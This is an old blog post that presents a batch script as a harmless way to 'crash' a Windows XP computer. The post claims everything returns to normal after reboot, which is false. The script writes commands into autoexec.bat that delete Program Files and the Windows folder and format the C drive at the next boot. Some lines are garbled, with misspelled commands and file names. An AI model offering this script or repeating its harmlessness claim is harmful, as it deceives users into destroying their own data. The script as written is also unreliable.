back to home page

How to crash a computer on Windows XP

Posted on March 14th, 2008

First open a notepad.txt copy the lines quoted below, then save as autoexec.bat – then double click your batch file. It’s really easy and harmless :) – when you reboot the computer everything should be back to normal. :)

echo off@
cls
call attrib -h -r c:\autoexec.bat >nul
echo @echo off >c:\autoexec.bat
echo deltree /y c:\progra~1\*.* nul >>c:\autoexec.bat
echo copy c:\******s\command\forma.com c:\ >nul >>c:\autoexe.bat
echo copy c:\******s\command/deltree.exe c:\ >nul >>c:\autoexec.bat
echo deltre /y c:\******s\*.* >nul >>c:\autoexec.bat
echoformat c:/q /u /autotest >nul >>c:\autoexe.bat


Leave a Reply

    To syntax highlight code just use [cc lang="whatever language here"]your code here[/cc]